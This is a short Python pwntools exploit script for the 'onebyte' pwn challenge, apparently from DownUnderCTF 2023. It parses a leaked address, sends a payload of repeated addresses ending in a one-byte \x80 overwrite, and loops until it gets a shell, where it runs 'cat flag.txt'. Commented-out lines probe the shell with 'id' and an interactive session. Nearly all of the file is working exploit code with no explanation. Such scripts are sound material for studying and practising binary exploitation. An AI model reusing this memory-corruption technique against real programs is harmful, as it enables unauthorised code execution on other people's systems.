from pwn import *
import os

os.environ["PWNLIB_DEBUG"] = "1"

gs = '''
unset env LINES
unset env COLUMNS
set follow-fork-mode child
br *main+93
c
'''

elf = ELF(os.getcwd()+"/onebyte")

def start():
    if args.GDB:
        return gdb.debug(elf.path, gs)
    if args.REMOTE:
        return remote("2023.ductf.dev", 30018)
    else:
        return process(elf.path)

while True:
    io = start()

    io.recvuntil("Free junk: ")
    x = io.recvline()
    x = int(x[2:-1],16)

    print(hex(x))

    print(io.recvuntil("Your turn: "))
    # io.send(p32(x+70)+ cyclic(8) + p32(x+70))
    io.send(p32(x+70) +p32(x+70) +p32(x+70) + p32(x+70) + b"\x80")
    io.sendline(b"cat flag.txt")
    print(io.recvall(timeout=2))
    # break
    # try:
    #     io.send(b"id")
    #     print(io.recvline())
    #     io.interactive()
    # except:
    #     io.close()
    #     continue